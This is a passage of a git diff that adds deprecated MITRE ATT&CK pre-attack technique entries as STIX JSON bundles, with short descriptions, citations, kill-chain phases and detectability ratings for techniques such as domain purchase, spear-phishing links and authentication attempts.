Giovanni Vigna. (2014). Execute This! Analyzing Unsafe and Malicious Dynamic Code Loading in Android Applications. Retrieved April 12, 2017.", + "source_name": "Execute This!" + }, + { + "description": "Wish Wu. (2016, July 15). Fake News App in Hacking Team Dump Designed to Bypass Google Play. Retrieved April 12, 2017.", + "source_name": "HT Fake News App" + }, + { + "description": "Radhesh Krishnan Konoth, Victor van der Veen and Herbert Bos. (2016). How Anywhere Computing Just Killed Your Phone-Based Two-Factor Authentication. Retrieved April 12, 2017.", + "source_name": "Anywhere Computing kill 2FA" + }, + { + "description": "Google. (2016, April). Android Security 2015 Year In Review. Retrieved April 12, 2017.", + "source_name": "Android Security Review 2015" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:24:50.384Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1172", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Runtime code execution techniques and examples of their use are widely documented on both Apple iOS and Android.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Third-party mobile application security analysis services exist that scan for use of these techniques in iOS and Android applications. Additionally, Google specifically calls out the ability to \"identify attacks that require connection to a server and dynamic downloading of code\" in its Android Security 2015 Year in Review report. However, many applications use these techniques as part of their legitimate operation, increasing the difficulty of detecting or preventing malicious use.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--45242287-2964-4a3e-9373-159fad4d8195.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--45242287-2964-4a3e-9373-159fad4d8195.json new file mode 100644 index 0000000000000000000000000000000000000000..0d938a0a10d0635230bb8b2b1dc37586e2f22667 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--45242287-2964-4a3e-9373-159fad4d8195.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--2d1543eb-8a7f-423e-abfc-63c5c3ff92fe", + "spec_version": "2.0", + "objects": [ + { + "created": "2017-12-14T16:46:06.044Z", + "modified": "2020-10-26T13:42:49.342Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "type": "attack-pattern", + "x_mitre_old_attack_id": "PRE-T1105", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Proliferation of DNS TLDs and registrars. Adversary may choose domains that are similar to legitimate domains (aka \"domain typosquatting\" or homoglyphs).", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "This is by design captured in public registration logs. Various tools and services exist to track/query/monitor domain name registration information.", + "x_mitre_detectable_by_common_defenses": "Yes", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1328", + "external_id": "T1328" + }, + { + "source_name": "PWCSofacy2014", + "description": "Tom Lancaster and Michael Yip. (2014, December 05). APT28: Sofacy? So-funny.. Retrieved March 6, 2017." + } + ], + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1328).\n\nDomain Names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. (Citation: PWCSofacy2014)", + "name": "Buy domain name", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--45242287-2964-4a3e-9373-159fad4d8195", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--46017368-6e09-412b-a29c-385be201cc03.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--46017368-6e09-412b-a29c-385be201cc03.json new file mode 100644 index 0000000000000000000000000000000000000000..f3653f4316dd3dd2ac842766bd5799852ea6698d --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--46017368-6e09-412b-a29c-385be201cc03.json @@ -0,0 +1,51 @@ +{ + "type": "bundle", + "id": "bundle--a2d4d173-456c-458e-9e4f-d077d6196e34", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--46017368-6e09-412b-a29c-385be201cc03", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Obtain domain/IP registration information", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1251).\n\nFor a computing resource to be accessible to the public, domain names and IP addresses must be registered with an authorized organization. (Citation: Google Domains WHOIS) (Citation: FunAndSun2012) (Citation: Scasny2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1251", + "external_id": "T1251" + }, + { + "source_name": "Google Domains WHOIS", + "description": "Google Domains. (n.d.). About WHOIS. Retrieved April 2, 2017." + }, + { + "source_name": "FunAndSun2012", + "description": "Jeff Bardin. (2012, October 10). OSINT and Cyber Intelligence - Fun and Sun in Miami. Retrieved March 1, 2017." + }, + { + "source_name": "Scasny2015", + "description": "Gregory Scasny. (2015, September 14). Understanding Open Source Intelligence (OSINT) and its relationship to Identity Theft. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Open access to DNS registration/routing information is inherent in Internet architecture.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Proliferation of DNS information makes registration information functionally freely available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1028", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "technical-information-gathering" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4886e3c2-468b-4e26-b7e5-2031d995d13a.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4886e3c2-468b-4e26-b7e5-2031d995d13a.json new file mode 100644 index 0000000000000000000000000000000000000000..83b6d4e0f0f25f6e08c7e8f514231625423a5a1b --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4886e3c2-468b-4e26-b7e5-2031d995d13a.json @@ -0,0 +1,49 @@ +{ + "type": "bundle", + "id": "bundle--cb202651-204e-4f42-8dab-c317ae46aa64", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--4886e3c2-468b-4e26-b7e5-2031d995d13a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Build or acquire exploits", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1349).\n\nAn exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. The adversary may use or modify existing exploits when those exploits are still relevant to the environment they are trying to compromise. (Citation: NYTStuxnet) (Citation: NationsBuying)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1349", + "external_id": "T1349" + }, + { + "source_name": "NYTStuxnet", + "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", + "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" + }, + { + "source_name": "NationsBuying", + "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.", + "url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "build-capabilities" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1126", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Several exploit repositories and tool suites exist for re-use and tailoring.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Adversary will likely use code repositories, but development will be performed on their local systems.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6.json new file mode 100644 index 0000000000000000000000000000000000000000..c35d05bcd99895b525202a577ebef6a4fb22f8ef --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6.json @@ -0,0 +1,43 @@ +{ + "type": "bundle", + "id": "bundle--647282eb-2f81-4e7b-88dd-bc75539622f0", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--488da8ed-2887-4ef6-a39a-5b69bc6682c6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Acquire and/or use 3rd party software services", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1330).\n\nA wide variety of 3rd party software services are available (e.g., [Twitter](https://twitter.com), [Dropbox](https://www.dropbox.com), [GoogleDocs](https://www.google.com/docs/about)). Use of these solutions allow an adversary to stage, launch, and execute an attack from infrastructure that does not physically tie back to them and can be rapidly provisioned, modified, and shut down. (Citation: LOWBALL2015)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1330", + "external_id": "T1330" + }, + { + "source_name": "LOWBALL2015", + "description": "FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved March 1, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility over account creation for 3rd party software services.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "3rd party services like these listed are freely available.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1107", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "establish-&-maintain-infrastructure" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--489a7797-01c3-4706-8cd1-ec56a9db3adc.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--489a7797-01c3-4706-8cd1-ec56a9db3adc.json new file mode 100644 index 0000000000000000000000000000000000000000..c30ce457843c229c61fbbdb2d760b1f4abccc55a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--489a7797-01c3-4706-8cd1-ec56a9db3adc.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--eb6e7a08-0759-43c6-9252-c8e078d90b8e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1369", + "url": "https://attack.mitre.org/techniques/T1369" + }, + { + "description": "Nick Johnston. (2014, March 13). Google Docs Users Targeted by Sophisticated Phishing Scam. Retrieved March 29, 2017.", + "source_name": "GoogleDrive Phishing" + }, + { + "description": "Bob Griffin. (2015, May 16). THE ON-GOING THREAT OF SOCIAL ENGINEERING. Retrieved March 9, 2017.", + "source_name": "RSASEThreat" + } + ], + "description": "**This technique has been deprecated. Please use [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002).**\n\nEmails with malicious links are designed to get a user to click on the link in order to deliver malware payloads. (Citation: GoogleDrive Phishing) (Citation: RSASEThreat)", + "name": "Spear phishing messages with malicious links", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--489a7797-01c3-4706-8cd1-ec56a9db3adc", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:25:58.783Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_detectable_by_common_defenses": "Yes", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses_explanation": "Defenders can implement mechanisms to analyze links and identify levels of concerns. However, the adversary has the advantage of creating new links or finding ways to obfuscate the link so that common detection lists can not identify it. Detection of a malicious link could be identified once the file has been downloaded.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Sending emails is trivial and expected. The adversary needs to ensure links don't get tampered, removed, or flagged as a previously black-listed site.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1146" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077.json new file mode 100644 index 0000000000000000000000000000000000000000..4dd8b7ffb5a3c26932191163bcb0e9ded60ced66 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--477324fc-a306-4574-a608-fa6b52e366f1", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--4900fabf-1142-4c1f-92f5-0b590e049077", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise 3rd party infrastructure to support delivery", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1312).\n\nInstead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it for some or all of the attack cycle. (Citation: WateringHole2014) (Citation: FireEye Operation SnowMan)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1312", + "external_id": "T1312" + }, + { + "source_name": "WateringHole2014", + "description": "Pierluigi Paganini. (2014, February 15). FireEye discovered a new watering hole attack based on 0-day exploit. Retrieved March 1, 2017." + }, + { + "source_name": "FireEye Operation SnowMan", + "description": "Darien Kindlund, Xiaobo Chen, Mike Scott, Ned Moran, Dan Caselden. (2014, February 13). Operation SnowMan: DeputyDog Actor Compromises US Veterans of Foreign Wars Website. Retrieved March 28, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Defender will not have visibility on 3rd party sites unless target is successfully enticed to visit one.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Commonly used technique currently (e.g., [https://www.wordpress.com WordPress] sites) as precursor activity to launching attack against intended target (e.g., acquiring botnet or layers of proxies for reducing attribution possibilities).", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1089", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "adversary-opsec" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4aeafdb3-eb0b-4e8e-b93f-95cd499088b4.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4aeafdb3-eb0b-4e8e-b93f-95cd499088b4.json new file mode 100644 index 0000000000000000000000000000000000000000..df74ab87a88ac28380f20c15a70a4d7100d7da14 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4aeafdb3-eb0b-4e8e-b93f-95cd499088b4.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--52bc0882-0410-4c90-b750-f23a6b781dcc", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--4aeafdb3-eb0b-4e8e-b93f-95cd499088b4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Compromise of externally facing system", + "description": "**This technique has been deprecated. Please use [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) and [External Remote Services](https://attack.mitre.org/techniques/T1133) where appropriate.**\n\nExternally facing systems allow connections from outside the network as a normal course of operations. Externally facing systems may include, but are not limited to, websites, web portals, email, DNS, FTP, VPN concentrators, and boarder routers and firewalls. These systems could be in a demilitarized zone (DMZ) or may be within other parts of the internal environment. (Citation: CylanceOpCleaver) (Citation: DailyTechAntiSec)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1388", + "url": "https://attack.mitre.org/techniques/T1388" + }, + { + "description": "CYLANCE. (n.d.). Operation Cleaver. Retrieved March 6, 2017.", + "source_name": "CylanceOpCleaver" + }, + { + "description": "Jason Mick. (2011, July 12). AntiSec Exposes U.S. Soldiers' S/Ns, Passwords, Vows Attack on Monsanto. Retrieved March 9, 2017.", + "source_name": "DailyTechAntiSec" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "compromise" + } + ], + "modified": "2020-03-30T14:16:12.162Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1165", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "DMZ environments are specifically designed to be isolated because one assumes they will ultimately be compromised by the adversary.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Most DMZs are monitored but are also designed so that if they are compromised, the damage/risk is limited.", + "x_mitre_deprecated": true, + "x_mitre_detectable_by_common_defenses": "Yes" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4dfb98ea-03cc-4a9c-a3a7-b22e14f126c4.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4dfb98ea-03cc-4a9c-a3a7-b22e14f126c4.json new file mode 100644 index 0000000000000000000000000000000000000000..f98003b82fb4e8a37753145f3399deb7bdd08b32 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4dfb98ea-03cc-4a9c-a3a7-b22e14f126c4.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--fbbe096b-ed34-4c9f-87fa-ba30637f4cd2", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--4dfb98ea-03cc-4a9c-a3a7-b22e14f126c4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Authentication attempt", + "description": "**This technique has been deprecated. Please see ATT&CK's Initial Access and Execution tactics for replacement techniques.**\n\nAttempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials to authenticate remotely. This access could be to a web portal, through a VPN, or in a phone app. (Citation: Remote Access Healthcare) (Citation: RDP Point of Sale)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "external_id": "T1381", + "url": "https://attack.mitre.org/techniques/T1381" + }, + { + "description": "Gary Glover. (2015, June 25). Remote access threats are imminent. Retrieved March 31, 2017.", + "source_name": "Remote Access Healthcare" + }, + { + "description": "Brian Prince. (2014, July 31). Hackers Turn Remote Desktop Tools Into Gateways for Point-of-Sale Malware Attacks. Retrieved March 31, 2017.", + "source_name": "RDP Point of Sale" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "launch" + } + ], + "modified": "2020-03-30T14:13:56.705Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_is_subtechnique": false, + "x_mitre_old_attack_id": "PRE-T1158", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Attempt to use default vendor credentials, brute force credentials, or previously obtained legitimate credentials. This is increasingly difficult to obtain access when two-factor authentication mechanisms are employed.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "This is possible with diligent monitoring of login anomalies, expected user behavior/location. If the adversary uses legitimate credentials, it may go undetected.", + "x_mitre_detectable_by_common_defenses": "Partial", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4fad17d3-8f42-449d-ac4b-dbb4c486127d.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4fad17d3-8f42-449d-ac4b-dbb4c486127d.json new file mode 100644 index 0000000000000000000000000000000000000000..1bef4b4b92efea54b9529fa5c2fb984f64b93110 --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--4fad17d3-8f42-449d-ac4b-dbb4c486127d.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--e6592e72-5fc5-45da-ba2e-7a293098b028", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--4fad17d3-8f42-449d-ac4b-dbb4c486127d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Assign KITs, KIQs, and/or intelligence requirements", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1238).\n\nOnce generated, Key Intelligence Topics (KITs), Key Intelligence Questions (KIQs), and/or intelligence requirements are assigned to applicable agencies and/or personnel. For example, an adversary may decide nuclear energy requirements should be assigned to a specific organization based on their mission. (Citation: AnalystsAndPolicymaking) (Citation: JP2-01)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1238", + "external_id": "T1238" + }, + { + "source_name": "AnalystsAndPolicymaking", + "description": "Jack Davis. (2002, September). Improving CIA Analytic Performance: Analysts and the Policymaking Process. Retrieved March 5, 2017." + }, + { + "source_name": "JP2-01", + "description": "Joint Chiefs of Staff. (2012, January 05). Joint and National Intelligence Support to Military Operations. Retrieved March 2, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_version": "1.0", + "x_mitre_old_attack_id": "PRE-T1015", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-pre-attack", + "phase_name": "priority-definition-direction" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--51bca707-a806-49bf-91e0-03885b0ac85c.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--51bca707-a806-49bf-91e0-03885b0ac85c.json new file mode 100644 index 0000000000000000000000000000000000000000..280dc8f79d473dc6d3b4f8ac1fdbd6ac760d55be --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--51bca707-a806-49bf-91e0-03885b0ac85c.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--81b28e5e-bba9-45af-badc-872beab91e81", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--51bca707-a806-49bf-91e0-03885b0ac85c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Conduct cost/benefit analysis", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1226).\n\nLeadership conducts a cost/benefit analysis that generates a compelling need for information gathering which triggers a Key Intelligence Toptic (KIT) or Key Intelligence Question (KIQ). For example, an adversary compares the cost of cyber intrusions with the expected benefits from increased intelligence collection on cyber adversaries. (Citation: LowenthalCh4) (Citation: KIT-Herring)", + "external_references": [ + { + "external_id": "T1226", + "url": "https://attack.mitre.org/techniques/T1226", + "source_name": "mitre-pre-attack" + }, + { + "description": "Mark M. Lowenthal. (n.d.). Ch 4: The Intelligence Process--A Macro Look; Who Does What for Whome?, Intelligence: From Secrets to Policy. Retrieved March 2, 2017.", + "source_name": "LowenthalCh4" + }, + { + "description": "Jan P. Herring. (1999). Key Intelligence Topics: A Process to Identify and Define Intelligence Needs. Retrieved May 19, 2017.", + "source_name": "KIT-Herring" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "phase_name": "priority-definition-planning", + "kill_chain_name": "mitre-pre-attack" + } + ], + "modified": "2020-10-26T13:42:49.342Z", + "created": "2017-12-14T16:46:06.044Z", + "x_mitre_old_attack_id": "PRE-T1003", + "x_mitre_version": "1.0", + "x_mitre_difficulty_for_adversary_explanation": "Normal aspect of adversary planning lifecycle. May not be done by all adversaries.", + "x_mitre_difficulty_for_adversary": "Yes", + "x_mitre_detectable_by_common_defenses_explanation": "Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.", + "x_mitre_detectable_by_common_defenses": "No", + "x_mitre_deprecated": true + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5436571f-2332-4b51-b7ed-0bc822fe02c2.json b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5436571f-2332-4b51-b7ed-0bc822fe02c2.json new file mode 100644 index 0000000000000000000000000000000000000000..4661e3fc4f713c1de64c44bf3b60217e87342b1a --- /dev/null +++ b/cti-ATT-CK-v13.1/pre-attack/attack-pattern/attack-pattern--5436571f-2332-4b51-b7ed-0bc822fe02c2.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--a5fdb8f7-a45b-465e-b82d-64ec660505b5", + "spec_version": "2.0", + "objects": [ + { + "id": "attack-pattern--5436571f-2332-4b51-b7ed-0bc822fe02c2", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "OS-vendor provided communication channels", + "description": "This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1390).\n\nGoogle and Apple provide Google Cloud Messaging and Apple Push Notification Service, respectively, services designed to enable efficient communication between third-party mobile app backend servers and the mobile apps running on individual devices. These services maintain an encrypted connection between every mobile device and Google or Apple that cannot easily be inspected and must be allowed to traverse networks as part of normal device operation. These services could be used by adversaries for communication to compromised mobile devices. (Citation: Securelist Mobile Malware 2013) (Citation: DroydSeuss)", + "external_references": [ + { + "source_name": "mitre-pre-attack", + "url": "https://attack.mitre.org/techniques/T1390", + "external_id": "T1390" + }, + { + "source_name": "Securelist Mobile Malware 2013", + "description": "Roman Unuchek, Victor Chebyshev. (2014, February 24). Mobile Malware Evolution: 2013. Retrieved April 12, 2017." + }, + { + "source_name": "DroydSeuss", + "description": "Alberto Coletta, Victor van der Veen, and Federico Maggi. (2016). DroydSeuss: A Mobile Banking Trojan Tracker - Short Paper. Retrieved April 12, 2017." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + 